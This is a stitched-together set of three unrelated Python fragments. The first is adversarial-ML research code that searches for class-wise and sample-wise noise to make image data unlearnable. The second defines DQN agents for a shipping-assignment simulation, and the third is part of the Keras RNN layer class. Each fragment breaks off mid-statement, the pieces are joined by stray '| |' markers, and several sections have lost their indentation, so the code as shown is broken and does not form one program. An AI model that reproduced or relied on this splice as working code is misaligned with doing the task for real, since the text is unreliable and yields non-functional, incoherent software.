        data_loader: dict of DataLoaders keyed by split name.
        model: network to evaluate.
        eval_target: key into ``data_loader`` selecting the split.

    Returns:
        Tuple ``(avg_loss, avg_error_rate)`` over the split.
    """
    loss_meter = util.AverageMeter()
    err_meter = util.AverageMeter()
    # Bug fix: only move the noise to the device when it exists. The old code
    # called random_noise.to(device) unconditionally, which crashed for
    # random_noise=None and made the None check below unreachable.
    if random_noise is not None:
        random_noise = random_noise.to(device)
    model = model.to(device)
    for images, labels in data_loader[eval_target]:
        images, labels = images.to(device, non_blocking=True), labels.to(device, non_blocking=True)
        if random_noise is not None:
            # Paste each sample's class noise onto its image. (Index renamed
            # from `i`, which shadowed the old outer loop variable.)
            for k in range(len(labels)):
                class_index = labels[k].item()
                noise = random_noise[class_index]
                mask_cord, class_noise = noise_generator._patch_noise_extend_to_img(noise, image_size=images[k].shape, patch_location=args.patch_location)
                images[k] += class_noise
        pred = model(images)
        err = (pred.data.max(1)[1] != labels.data).float().sum()
        loss = torch.nn.CrossEntropyLoss()(pred, labels)
        loss_meter.update(loss.item(), len(labels))
        err_meter.update(err / len(labels))
    return loss_meter.avg, err_meter.avg
def universal_perturbation(noise_generator, trainer, evaluator, model, criterion, optimizer, scheduler, random_noise, ENV):
    """Search for class-wise (universal) perturbations.

    Alternates between (for min-min without a preloaded model) training the
    model on noise-augmented batches and updating the per-class noise via the
    min-min/min-max attack, until the error rate crosses
    ``args.universal_stop_error`` in the direction required by
    ``args.attack_type``.

    Returns:
        The final per-class noise, clamped to ``[-args.epsilon, args.epsilon]``.
    """
    # Generate the data loaders (no train-time augmentation so noise indexing
    # stays consistent).
    datasets_generator = dataset.DatasetGenerator(train_batch_size=args.train_batch_size,
                                                  eval_batch_size=args.eval_batch_size,
                                                  train_data_type=args.train_data_type,
                                                  train_data_path=args.train_data_path,
                                                  test_data_type=args.test_data_type,
                                                  test_data_path=args.test_data_path,
                                                  num_of_workers=args.num_of_workers,
                                                  seed=args.seed, no_train_augments=True)
    if args.use_subset:
        data_loader = datasets_generator._split_validation_set(train_portion=args.universal_train_portion,
                                                               train_shuffle=True, train_drop_last=True)
    else:
        data_loader = datasets_generator.getDataLoader(train_shuffle=True, train_drop_last=True)

    condition = True
    data_iter = iter(data_loader['train_dataset'])
    logger.info('=' * 20 + 'Searching Universal Perturbation' + '=' * 20)
    if hasattr(model, 'classify'):
        model.classify = True
    while condition:
        if args.attack_type == 'min-min' and not args.load_model:
            # Train the model for a few batches on noise-augmented images.
            for j in range(0, args.train_step):
                try:
                    (images, labels) = next(data_iter)
                except StopIteration:
                    # Bug fix: catch only iterator exhaustion; the old bare
                    # `except:` silently swallowed every error.
                    data_iter = iter(data_loader['train_dataset'])
                    (images, labels) = next(data_iter)
                images, labels = images.to(device), labels.to(device)
                # Add class-wise noise to each sample.
                train_imgs = []
                for k, (image, label) in enumerate(zip(images, labels)):
                    noise = random_noise[label.item()]
                    mask_cord, class_noise = noise_generator._patch_noise_extend_to_img(noise, image_size=image.shape, patch_location=args.patch_location)
                    train_imgs.append(images[k] + class_noise)
                # Train step.
                model.train()
                for param in model.parameters():
                    param.requires_grad = True
                trainer.train_batch(torch.stack(train_imgs).to(device), labels, model, optimizer)

        for i, (images, labels) in tqdm(enumerate(data_loader[args.universal_train_target]), total=len(data_loader[args.universal_train_target])):
            images, labels, model = images.to(device), labels.to(device), model.to(device)
            # Add class-wise noise to each sample. (Inner index renamed to `k`
            # to stop shadowing the batch loop variable `i`.)
            batch_noise, mask_cord_list = [], []
            for k, (image, label) in enumerate(zip(images, labels)):
                noise = random_noise[label.item()]
                mask_cord, class_noise = noise_generator._patch_noise_extend_to_img(noise, image_size=image.shape, patch_location=args.patch_location)
                batch_noise.append(class_noise)
                mask_cord_list.append(mask_cord)

            # Update the universal perturbation with the model frozen.
            model.eval()
            for param in model.parameters():
                param.requires_grad = False
            batch_noise = torch.stack(batch_noise).to(device)
            if args.attack_type == 'min-min':
                perturb_img, eta = noise_generator.min_min_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
            elif args.attack_type == 'min-max':
                perturb_img, eta = noise_generator.min_max_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
            else:
                # Bug fix: `raise('Invalid attack')` raised TypeError (strings
                # are not exceptions); raise a proper exception type instead.
                raise ValueError('Invalid attack')

            # Accumulate per-class deltas from the noise patches.
            class_noise_eta = collections.defaultdict(list)
            for n in range(len(eta)):
                x1, x2, y1, y2 = mask_cord_list[n]
                delta = eta[n][:, x1: x2, y1: y2]
                class_noise_eta[labels[n].item()].append(delta.detach().cpu())
            for key in class_noise_eta:
                delta = torch.stack(class_noise_eta[key]).mean(dim=0) - random_noise[key]
                class_noise = random_noise[key]
                class_noise += delta
                random_noise[key] = torch.clamp(class_noise, -args.epsilon, args.epsilon)

        # Evaluate termination conditions.
        loss_avg, error_rate = universal_perturbation_eval(noise_generator, random_noise, data_loader, model, eval_target=args.universal_train_target)
        logger.info('Loss: {:.4f} Acc: {:.2f}%'.format(loss_avg, 100 - error_rate*100))
        random_noise = random_noise.detach()
        ENV['random_noise'] = random_noise
        if args.attack_type == 'min-min':
            condition = error_rate > args.universal_stop_error
        elif args.attack_type == 'min-max':
            condition = error_rate < args.universal_stop_error
    return random_noise
def samplewise_perturbation_eval(random_noise, data_loader, model, eval_target='train_dataset', mask_cord_list=None):
    """Evaluate ``model`` with per-sample noise pasted onto each image.

    Args:
        random_noise: per-sample noise (tensor or numpy array) indexed in
            data-loader order, or None for a clean pass.
        data_loader: dict of DataLoaders keyed by split name.
        model: network to evaluate.
        eval_target: key into ``data_loader`` selecting the split.
        mask_cord_list: per-sample ``(x1, x2, y1, y2)`` patch coordinates.

    Returns:
        Tuple ``(avg_loss, avg_error_rate)`` over the split.
    """
    # Bug fix: the old signature used a mutable default ([]), which is shared
    # across calls; use None as the sentinel and build a fresh list per call.
    if mask_cord_list is None:
        mask_cord_list = []
    loss_meter = util.AverageMeter()
    err_meter = util.AverageMeter()
    model = model.to(device)
    idx = 0
    for images, labels in data_loader[eval_target]:
        images, labels = images.to(device, non_blocking=True), labels.to(device, non_blocking=True)
        if random_noise is not None:
            # Inner index renamed to `k` — the old `i` shadowed the batch loop
            # variable.
            for k, (image, label) in enumerate(zip(images, labels)):
                if not torch.is_tensor(random_noise):
                    sample_noise = torch.tensor(random_noise[idx]).to(device)
                else:
                    sample_noise = random_noise[idx].to(device)
                c, h, w = image.shape[0], image.shape[1], image.shape[2]
                # Expand the noise patch to a full-size mask at its coordinates.
                mask = np.zeros((c, h, w), np.float32)
                x1, x2, y1, y2 = mask_cord_list[idx]
                mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
                sample_noise = torch.from_numpy(mask).to(device)
                images[k] = images[k] + sample_noise
                idx += 1
        pred = model(images)
        err = (pred.data.max(1)[1] != labels.data).float().sum()
        loss = torch.nn.CrossEntropyLoss()(pred, labels)
        loss_meter.update(loss.item(), len(labels))
        err_meter.update(err / len(labels))
    return loss_meter.avg, err_meter.avg
def sample_wise_perturbation(noise_generator, trainer, evaluator, model, criterion, optimizer, scheduler, random_noise, ENV):
datasets_generator = dataset.DatasetGenerator(train_batch_size=args.train_batch_size,
eval_batch_size=args.eval_batch_size,
train_data_type=args.train_data_type,
train_data_path=args.train_data_path,
test_data_type=args.test_data_type,
test_data_path=args.test_data_path,
num_of_workers=args.num_of_workers,
seed=args.seed, no_train_augments=True)
if args.train_data_type == 'ImageNetMini' and args.perturb_type == 'samplewise':
data_loader = datasets_generator._split_validation_set(0.2, train_shuffle=False, train_drop_last=False)
data_loader['train_dataset'] = data_loader['train_subset']
else:
data_loader = datasets_generator.getDataLoader(train_shuffle=False, train_drop_last=False)
mask_cord_list = []
idx = 0
for images, labels in data_loader['train_dataset']:
for i, (image, label) in enumerate(zip(images, labels)):
noise = random_noise[idx]
mask_cord, _ = noise_generator._patch_noise_extend_to_img(noise, image_size=image.shape, patch_location=args.patch_location)
mask_cord_list.append(mask_cord)
idx += 1
condition = True
train_idx = 0
data_iter = iter(data_loader['train_dataset'])
logger.info('=' * 20 + 'Searching Samplewise Perturbation' + '=' * 20)
while condition:
if args.attack_type == 'min-min' and not args.load_model:
# Train Batch for min-min noise
for j in tqdm(range(0, args.train_step), total=args.train_step):
try:
(images, labels) = next(data_iter)
except:
train_idx = 0
data_iter = iter(data_loader['train_dataset'])
(images, labels) = next(data_iter)
images, labels = images.to(device), labels.to(device)
# Add Sample-wise Noise to each sample
for i, (image, label) in enumerate(zip(images, labels)):
sample_noise = random_noise[train_idx]
c, h, w = image.shape[0], image.shape[1], image.shape[2]
mask = np.zeros((c, h, w), np.float32)
x1, x2, y1, y2 = mask_cord_list[train_idx]
if type(sample_noise) is np.ndarray:
mask[:, x1: x2, y1: y2] = sample_noise
else:
mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
# mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
sample_noise = torch.from_numpy(mask).to(device)
images[i] = images[i] + sample_noise
train_idx += 1
model.train()
for param in model.parameters():
param.requires_grad = True
trainer.train_batch(images, labels, model, optimizer)
# Search For Noise
idx = 0
for i, (images, labels) in tqdm(enumerate(data_loader['train_dataset']), total=len(data_loader['train_dataset'])):
images, labels, model = images.to(device), labels.to(device), model.to(device)
# Add Sample-wise Noise to each sample
batch_noise, batch_start_idx = [], idx
for i, (image, label) in enumerate(zip(images, labels)):
sample_noise = random_noise[idx]
c, h, w = image.shape[0], image.shape[1], image.shape[2]
mask = np.zeros((c, h, w), np.float32)
x1, x2, y1, y2 = mask_cord_list[idx]
if type(sample_noise) is np.ndarray:
mask[:, x1: x2, y1: y2] = sample_noise
else:
mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
# mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
sample_noise = torch.from_numpy(mask).to(device)
batch_noise.append(sample_noise)
idx += 1
# Update sample-wise perturbation
model.eval()
for param in model.parameters():
param.requires_grad = False
batch_noise = torch.stack(batch_noise).to(device)
if args.attack_type == 'min-min':
perturb_img, eta = noise_generator.min_min_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
elif args.attack_type == 'min-max':
perturb_img, eta = noise_generator.min_max_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
else:
raise('Invalid attack')
for i, delta in enumerate(eta):
x1, x2, y1, y2 = mask_cord_list[batch_start_idx+i]
delta = delta[:, x1: x2, y1: y2]
if torch.is_tensor(random_noise):
random_noise[batch_start_idx+i] = delta.detach().cpu().clone()
else:
random_noise[batch_start_idx+i] = delta.detach().cpu().numpy()
# Eval termination conditions
loss_avg, error_rate = samplewise_perturbation_eval(random_noise, data_loader, model, eval_target='train_dataset',
mask_cord_list=mask_cord_list)
logger.info('Loss: {:.4f} Acc: {:.2f}%'.format(loss_avg, 100 - error_rate*100))
if torch.is_tensor(random_noise):
random_noise = random_noise.detach()
ENV['random_noise'] = random_noise
if args.attack_type == 'min-min':
condition = error_rate > args.universal_stop_error
elif args.attack_type == 'min-max':
condition = error_rate < args.universal_stop_error
# Update Random Noise to shape
if torch.is_tensor(random_noise):
new_random_noise = []
for idx in range(len(random_noise)):
sample_noise = random_noise[idx]
c, h, w = image.shape[0], image.shape[1], image.shape[2]
mask = np.zeros((c, h, w), np.float32)
x1, x2, y1, y2 = mask_cord_list[idx]
mask[:, x1: x2, y1: y2] = | |
from __future__ import annotations
import functools
import logging
import numpy as np
import torch
import torch.nn as nn
import torch_geometric
import torchmetrics
from envs import shipping_assignment_state
from envs.shipping_assignment_env import ShippingAssignmentEnvironment
from torch import Tensor
from torch_geometric.nn import GCNConv, max_pool, global_max_pool
from agents.Agent import Agent
# Taken from a legacy implementation in the environment, to avoid the import. It's the location on the "state_vector" of the customer ID.
from agents.optimizer_agents import LookaheadAgent
from dqn.noisy_linear import NoisyLinear
_CUSTOMER_METADATA_NEURON = -3
class PyTorchAgent(Agent):
    """
    Base PyTorch Agent class for agents in Seminario II (~Sep 13).

    It's expected that an agent with this impl passes a network module that generates
    Q values the size of the environment action space.

    The agent is also responsible for converting the state into an input tensor. The
    default is "state_vector" in the state named tuple.

    Should override: get_state_vector, get_action, train.

    Args:
        env: training environment
        net: The PyTorch network module.
        epsilon: exploration probability for the epsilon-greedy policy.
        device: torch device name, e.g. "cpu" or a CUDA device.
    """

    logger = logging.getLogger(__name__)

    def __init__(
        self, env: ShippingAssignmentEnvironment, net, epsilon, device="cpu"
    ) -> None:
        super().__init__(env)
        self.env = env
        self.net = net
        self.device = device
        self.epsilon = epsilon
        # Row i marks which DCs are valid for customer i; used to mask Q values.
        self.dcs_per_customer_array = self.env.physical_network.dcs_per_customer_array
        self.invalid_penalty = self.env.physical_network.big_m_cost

    def get_state_vector(self, state):
        """Must be implemented by the concrete agent"""
        pass

    def mask_q_values(self, q_values, state):
        """Subtract a big-M penalty from Q values of DCs invalid for the current customer."""
        # Todo maybe move to the action space.
        customer_node_id = state.open[0].customer.node_id
        customer_id = self.env.physical_network.get_customer_id(customer_node_id)
        customer_valid_dcs = self.dcs_per_customer_array[customer_id, :]
        # Penalty logic: 1-valid dcs gives you invalid. Multiply that to amplify the 1s to penalty.
        penalty_for_invalid = -((1 - customer_valid_dcs) * self.invalid_penalty)
        masked_q_values = q_values + penalty_for_invalid
        return masked_q_values

    def get_action(self, state) -> int:
        """
        Using the given network, decide what action to carry out
        using an epsilon-greedy policy

        Returns:
            action
        """
        # TODO Sep 13: Before copying, this code was called in a method of this class called play step, decorated with no_grad.
        # Should I still no grad my stuff when this is called? Possibly, when doing the env step in the runner.
        if np.random.random() < self.epsilon:
            # Explore: delegate to the action space's sampler for this customer.
            action = self.env.action_space.sample(state.open[0].customer.node_id)
        else:
            state_vector = self.get_state_vector(state)
            if isinstance(state_vector, np.ndarray):
                state_vector = torch.tensor([state_vector])
            if self.device not in ["cpu"]:  # TODO THIS MAY BREAK WITH GNN
                # Bug fix: move the *tensor* to the device. The old code called
                # state.cuda(...) on the state namedtuple, which would raise
                # AttributeError on any non-CPU device.
                state_vector = state_vector.cuda(self.device)
            # Getting the action with the highest Q value.
            q_values = self.net(
                state_vector
            )  # TODO check that the star OP works with regular NN
            masked_q_values = self.mask_q_values(q_values, state)
            logging.debug("Network output Q values")
            logging.debug(q_values)
            logging.debug("Masked")
            logging.debug(masked_q_values)
            _, action = torch.max(masked_q_values, dim=1)
            action = int(action.item())
        logging.debug(f"Agent chose action {action}")
        return action

    def reset(self) -> None:
        """TODO as of sep 13 idk if I need this anymore (was copy pasted from old ptl agent), but probably was from OpenAI impl"""
        pass

    def train(self, experience):
        pass
class CustomerOnehotDQN(nn.Module):
    """
    Simple MLP network that uses the one hot encoding of customer IDs.

    Args:
        num_customers: observation size, which is the total number of customers
        num_dcs: action space, which is the total number of DCs.
    """

    def __init__(self, num_customers: int, num_dcs: int):
        super(CustomerOnehotDQN, self).__init__()
        self.num_customers = num_customers
        self.num_dcs = num_dcs
        # Deep funnel MLP (128 -> 64 -> 32 -> 16 -> 8) with dropout after
        # every hidden linear layer, ending in a Q-value head of size |DCs|.
        widths = [self.num_customers, 128, 64, 32, 16, 8]
        layers = []
        for fan_in, fan_out in zip(widths, widths[1:]):
            layers.extend([nn.Linear(fan_in, fan_out), nn.Dropout(p=0.1), nn.ReLU()])
        layers.append(nn.Linear(widths[-1], self.num_dcs))
        self.net = nn.Sequential(*layers)
        # Check shipping_assignment_environment for the metadata neuron
        # definition (create_state_vector, as of Sep 18).
        self.customer_metadata_neuron = _CUSTOMER_METADATA_NEURON

    def forward(self, x):
        """One-hot encode the customer ID from the raw state vector, then run the MLP."""
        with torch.no_grad():
            customer_onehot = torchmetrics.utilities.data.to_onehot(
                x[:, self.customer_metadata_neuron] - self.num_dcs,
                num_classes=self.num_customers,
            )
        return self.net(customer_onehot.float())
class CustomerDQNAgent(PyTorchAgent):
    """DQN agent whose observation is the environment's raw flattened state vector."""

    def __init__(self, env, customer_dqn, epsilon, **kwargs):
        super().__init__(env, customer_dqn, epsilon=epsilon, **kwargs)

    def get_state_vector(self, state):
        """Flatten the raw state vector to a 1-D observation."""
        raw_vector = state.state_vector
        return raw_vector.reshape(-1)

    def train(self, experience):
        """No-op: optimization is handled by PTL."""
        pass
class MaskedMLPDQN(nn.Module):
    """An MLP That takes as an input a one hot encoding mask of the valid warehouses.

    The motivation is that the agent doesn't have to learn that information and can
    instead focus on which is the best warehouse in terms of optimization cost.
    """

    def __init__(self, num_dcs):
        super().__init__()
        self.num_dcs = num_dcs
        # Funnel MLP 64 -> 32 -> 16 with a Q-value head of size |DCs|.
        hidden_widths = (64, 32, 16)
        layers = []
        previous_width = self.num_dcs
        for width in hidden_widths:
            layers.append(nn.Linear(previous_width, width))
            layers.append(nn.ReLU())
            previous_width = width
        layers.append(nn.Linear(previous_width, self.num_dcs))
        self.net = nn.Sequential(*layers)

    def forward(self, x):
        """Cast to float and run the MLP."""
        return self.net(x.float())
class MaskedMLPDQNAgent(PyTorchAgent):
    """An MLP whose input is the mask of which DCS are valid."""

    def __init__(self, env, mlp_dqn, epsilon, **kwargs):
        super().__init__(env, mlp_dqn, epsilon=epsilon, **kwargs)

    def get_state_vector(self, state):
        """Return the valid-DC mask row for the customer of the oldest open order."""
        oldest_order = state.open[0]
        cid = state.physical_network.get_customer_id(oldest_order.customer.node_id)
        return state.physical_network.dcs_per_customer_array[cid, :]

    def train(self, experience):
        """No-op: optimization is handled by PTL."""
        pass
class DebugMaskedMLPCheatDQN(nn.Module):
    """Debug MLP fed a 'cheat' input derived from lookahead actions.

    Intentionally minimal (one linear layer over the |DCs|-sized cheat
    one-hot) so learning the cheat signal should be trivial if training
    works at all.
    """

    def __init__(self, num_dcs):
        super().__init__()
        self.num_dcs = num_dcs
        self.net = nn.Sequential(
            nn.Linear(self.num_dcs, self.num_dcs),
        )

    def forward(self, x):
        """Cast to float and apply the single linear layer."""
        return self.net(x.float())
class MaskedMLPWithCheatDQNAgent(PyTorchAgent):
    """This agent is to debug that the NNs are actually learning, because the lookahead input
    is a cheat code and it should use it to get the best action most times."""

    logger = logging.getLogger(__name__)

    def __init__(self, env, mlp_dqn, epsilon, **kwargs):
        self.lookahead_agent = LookaheadAgent(env)
        super().__init__(env, mlp_dqn, epsilon=epsilon, **kwargs)

    def get_state_vector(self, state):
        """Return a one-hot of the lookahead agent's chosen action (the 'cheat' signal).

        Returns:
            A float numpy vector of size |DCs| with 1.0 at the lookahead action.
        """
        lookahead_action = self.lookahead_agent.get_action(
            state
        )  # Todo: this calls too many lookaheads.
        # TODO also consider using the cost vector directly.
        # Cleanup: dropped the redundant `* 0.0` after np.zeros (already zeros,
        # already float64) and the dead `state_vector` local — the method has
        # always returned the lookahead one-hot.
        lookahead_onehot = np.zeros(state.physical_network.num_dcs)
        lookahead_onehot[lookahead_action] = 1.0
        latest_open_order = state.open[0]
        customer_id = state.physical_network.get_customer_id(
            latest_open_order.customer.node_id
        )
        # Only used for the debug log below.
        mask_vector = state.physical_network.dcs_per_customer_array[customer_id, :]
        self.logger.debug("MLP with Cheat state vector (lookahead onehotted)")
        self.logger.debug(lookahead_onehot)
        self.logger.debug(" and valid warehouses are: ")
        self.logger.debug(mask_vector)
        return lookahead_onehot

    def train(self, experience):
        """This is not needed, it's handled by PTL"""
        pass
class MaskedPlusOneHotDQN(nn.Module):
    """Q network over the valid-DC mask concatenated with the customer one-hot.

    Combines the inputs of MaskedMLPDQN and CustomerOnehotDQN.
    """

    def __init__(self, num_customers, num_dcs):
        super().__init__()
        self.num_dcs = num_dcs
        self.num_customers = num_customers
        input_width = self.num_dcs + self.num_customers
        # Funnel MLP 64 -> 32 -> 16 with a Q-value head of size |DCs|.
        self.net = nn.Sequential(
            nn.Linear(input_width, 64),
            nn.ReLU(),
            nn.Linear(64, 32),
            nn.ReLU(),
            nn.Linear(32, 16),
            nn.ReLU(),
            nn.Linear(16, self.num_dcs),
        )

    def forward(self, x):
        """Cast to float and run the MLP."""
        float_input = x.float()
        return self.net(float_input)
class MaskedPlusOneHotDQNAgent(PyTorchAgent):
    """An MLP whose input is the mask of which DCS are valid, concatenated with customer onehot."""

    def __init__(self, env, mlp_dqn, epsilon, **kwargs):
        super().__init__(env, mlp_dqn, epsilon=epsilon, **kwargs)

    def get_state_vector(self, state):
        """Build the mask+one-hot observation as a numpy array."""
        encoded = state_to_mask_concat_onehot(state)  # TODO inefficient as hell.
        return encoded.detach().numpy()

    def train(self, experience):
        pass
class FullMLPDQN(nn.Module):
"""The combination of MaskedNLP and CustomerOneHot"""
def __init__(self, num_customers, num_dcs, num_commodities):
super().__init__()
self.num_dcs = num_dcs
self.num_customers = num_customers
self.num_commodities = num_commodities
# Calculating input size.
mask_size = num_dcs
onehot_size = num_customers
inventory_size = num_commodities * num_dcs
demand = num_commodities
backlog = num_commodities
inventory_after_current_order = num_dcs # A vector of size |W| that says if the current order fits in each dc.
input_size = (
mask_size
+ onehot_size
+ inventory_size
+ demand
+ backlog
+ inventory_after_current_order
)
# Don't be fooled, the layer sizes were pretty arbitrary.
# self.net = nn.Sequential(
# nn.Linear(input_size, input_size * 4),
# nn.LayerNorm(
# input_size * 4
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size * 4, input_size * 2),
# nn.LayerNorm(
# input_size * 2
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size * 2, input_size),
# nn.LayerNorm(
# input_size
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size, input_size // 2),
# nn.LayerNorm(
# input_size // 2
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size // 2, self.num_dcs),
# )
# Small wide
# self.net = nn.Sequential(
# nn.Linear(input_size, 256), nn.Tanh(), nn.Linear(256, self.num_dcs)
# )
# Linear
# self.net = nn.Sequential(nn.Linear(input_size, self.num_dcs))
# Small wide noisy
# self.net = nn.Sequential(
# NoisyLinear(input_size, 256), nn.Tanh(), NoisyLinear(256, self.num_dcs)
# )
# Linear Noisy
self.net = nn.Sequential(nn.Linear(input_size, self.num_dcs))
def forward(self, x):
normalized_in = | |
as initial
state for the sample of index i in the following batch.
unroll: Boolean (default False).
If True, the network will be unrolled,
else a symbolic loop will be used.
Unrolling can speed-up a RNN,
although it tends to be more memory-intensive.
Unrolling is only suitable for short sequences.
input_dim: dimensionality of the input (integer or tuple of integers).
This argument (or alternatively, the keyword argument `input_shape`)
is required when using this layer as the first layer in a model.
input_length: Length of input sequences, to be specified
when it is constant.
This argument is required if you are going to connect
`Flatten` then `Dense` layers upstream
(without it, the shape of the dense outputs cannot be computed).
Note that if the recurrent layer is not the first layer
in your model, you would need to specify the input length
at the level of the first layer
(e.g. via the `input_shape` argument)
time_major: The shape format of the `inputs` and `outputs` tensors.
If True, the inputs and outputs will be in shape
`(timesteps, batch, ...)`, whereas in the False case, it will be
`(batch, timesteps, ...)`. Using `time_major = True` is a bit more
efficient because it avoids transposes at the beginning and end of the
RNN calculation. However, most TensorFlow data is batch-major, so by
default this function accepts input and emits output in batch-major
form.
Input shape:
N-D tensor with shape `(batch_size, timesteps, ...)` or
`(timesteps, batch_size, ...)` when time_major is True.
Output shape:
- if `return_state`: a list of tensors. The first tensor is
the output. The remaining tensors are the last states,
each with shape `(batch_size, state_size)`, where `state_size` could
be a high dimension tensor shape.
- if `return_sequences`: N-D tensor with shape
`(batch_size, timesteps, output_size)`, where `output_size` could
be a high dimension tensor shape, or
`(timesteps, batch_size, output_size)` when `time_major` is True.
- else, N-D tensor with shape `(batch_size, output_size)`, where
`output_size` could be a high dimension tensor shape.
# Masking
This layer supports masking for input data with a variable number
of timesteps. To introduce masks to your data,
use an [Embedding](embeddings.md) layer with the `mask_zero` parameter
set to `True`.
# Note on using statefulness in RNNs
You can set RNN layers to be 'stateful', which means that the states
computed for the samples in one batch will be reused as initial states
for the samples in the next batch. This assumes a one-to-one mapping
between samples in different successive batches.
To enable statefulness:
- specify `stateful=True` in the layer constructor.
- specify a fixed batch size for your model, by passing
if sequential model:
`batch_input_shape=(...)` to the first layer in your model.
else for functional model with 1 or more Input layers:
`batch_shape=(...)` to all the first layers in your model.
This is the expected shape of your inputs
*including the batch size*.
It should be a tuple of integers, e.g. `(32, 10, 100)`.
- specify `shuffle=False` when calling fit().
To reset the states of your model, call `.reset_states()` on either
a specific layer, or on your entire model.
# Note on specifying the initial state of RNNs
You can specify the initial state of RNN layers symbolically by
calling them with the keyword argument `initial_state`. The value of
`initial_state` should be a tensor or list of tensors representing
the initial state of the RNN layer.
You can specify the initial state of RNN layers numerically by
calling `reset_states` with the keyword argument `states`. The value of
`states` should be a numpy array or list of numpy arrays representing
the initial state of the RNN layer.
# Note on passing external constants to RNNs
You can pass "external" constants to the cell using the `constants`
keyword argument of `RNN.__call__` (as well as `RNN.call`) method. This
requires that the `cell.call` method accepts the same keyword argument
`constants`. Such constants can be used to condition the cell
transformation on additional static inputs (not changing over time),
a.k.a. an attention mechanism.
Examples:
```python
# First, let's define a RNN Cell, as a layer subclass.
class MinimalRNNCell(keras.layers.Layer):
def __init__(self, units, **kwargs):
self.units = units
self.state_size = units
super(MinimalRNNCell, self).__init__(**kwargs)
def build(self, input_shape):
self.kernel = self.add_weight(shape=(input_shape[-1], self.units),
initializer='uniform',
name='kernel')
self.recurrent_kernel = self.add_weight(
shape=(self.units, self.units),
initializer='uniform',
name='recurrent_kernel')
self.built = True
def call(self, inputs, states):
prev_output = states[0]
h = K.dot(inputs, self.kernel)
output = h + K.dot(prev_output, self.recurrent_kernel)
return output, [output]
# Let's use this cell in a RNN layer:
cell = MinimalRNNCell(32)
x = keras.Input((None, 5))
layer = RNN(cell)
y = layer(x)
# Here's how to use the cell to build a stacked RNN:
cells = [MinimalRNNCell(32), MinimalRNNCell(64)]
x = keras.Input((None, 5))
layer = RNN(cells)
y = layer(x)
```
"""
  def __init__(self,
               cell,
               return_sequences=False,
               return_state=False,
               go_backwards=False,
               stateful=False,
               unroll=False,
               time_major=False,
               **kwargs):
    """Validate the cell, wrap cell lists, and record layer configuration."""
    # A list/tuple of cells is wrapped into one stacked cell so the rest of
    # the layer can treat single and stacked cells uniformly.
    if isinstance(cell, (list, tuple)):
      cell = StackedRNNCells(cell)
    # The cell contract: a `call` method and a `state_size` attribute.
    if not hasattr(cell, 'call'):
      raise ValueError('`cell` should have a `call` method. '
                       'The RNN was passed:', cell)
    if not hasattr(cell, 'state_size'):
      raise ValueError('The RNN cell should have '
                       'an attribute `state_size` '
                       '(tuple of integers, '
                       'one integer per RNN state).')
    super(RNN, self).__init__(**kwargs)
    self.cell = cell
    # Register the cell as a checkpointable dependency when supported, so
    # its weights are saved/restored with the layer.
    if isinstance(cell, checkpointable.CheckpointableBase):
      self._track_checkpointable(self.cell, name='cell')
    self.return_sequences = return_sequences
    self.return_state = return_state
    self.go_backwards = go_backwards
    self.stateful = stateful
    self.unroll = unroll
    self.time_major = time_major
    self.supports_masking = True
    # The input shape is unknown yet, it could have nested tensor inputs, and
    # the input spec will be the list of specs for flattened inputs.
    self.input_spec = None
    self.state_spec = None
    self._states = None
    self.constants_spec = None
    self._num_constants = None
    self._num_inputs = None
@property
def states(self):
if self._states is None:
state = nest.map_structure(lambda _: None, self.cell.state_size)
return state if nest.is_sequence(self.cell.state_size) else [state]
return self._states
@states.setter
def states(self, states):
self._states = states
  def compute_output_shape(self, input_shape):
    """Compute output shape(s) from a (possibly nested) `input_shape`.
    When `input_shape` is a list (input plus initial states / constants),
    only the first entry describes the layer input.  Honors `time_major`,
    `return_sequences` and `return_state`.
    """
    if isinstance(input_shape, list):
      input_shape = input_shape[0]
    # Check whether the input shape contains any nested shapes. It could be
    # (tensor_shape(1, 2), tensor_shape(3, 4)) or (1, 2, 3) which is from numpy
    # inputs.
    try:
      input_shape = tensor_shape.as_shape(input_shape)
    except (ValueError, TypeError):
      # A nested tensor input
      input_shape = nest.flatten(input_shape)[0]
    batch = input_shape[0]
    time_step = input_shape[1]
    if self.time_major:
      # Time-major layout puts (time, batch) first; swap so the names below
      # stay accurate.
      batch, time_step = time_step, batch
    # Normalize state_size to a list so state_size[0] is well defined below.
    if _is_multiple_state(self.cell.state_size):
      state_size = self.cell.state_size
    else:
      state_size = [self.cell.state_size]
    def _get_output_shape(flat_output_size):
      # Shape for one flattened output entry, with or without the time axis.
      output_dim = tensor_shape.as_shape(flat_output_size).as_list()
      if self.return_sequences:
        if self.time_major:
          output_shape = tensor_shape.as_shape([time_step, batch] + output_dim)
        else:
          output_shape = tensor_shape.as_shape([batch, time_step] + output_dim)
      else:
        output_shape = tensor_shape.as_shape([batch] + output_dim)
      return output_shape
    if getattr(self.cell, 'output_size', None) is not None:
      # cell.output_size could be nested structure.
      output_shape = nest.flatten(nest.map_structure(
          _get_output_shape, self.cell.output_size))
      output_shape = output_shape[0] if len(output_shape) == 1 else output_shape
    else:
      # Note that state_size[0] could be a tensor_shape or int.
      output_shape = _get_output_shape(state_size[0])
    if self.return_state:
      def _get_state_shape(flat_state):
        # Each returned state keeps the batch dim plus its own state shape.
        state_shape = [batch] + tensor_shape.as_shape(flat_state).as_list()
        return tensor_shape.as_shape(state_shape)
      state_shape = nest.map_structure(_get_state_shape, state_size)
      return generic_utils.to_list(output_shape) + nest.flatten(state_shape)
    else:
      return output_shape
def compute_mask(self, inputs, mask):
if isinstance(mask, list):
mask = mask[0]
output_mask = mask if self.return_sequences else None
if self.return_state:
state_mask = [None for _ in self.states]
return [output_mask] + state_mask
else:
return output_mask
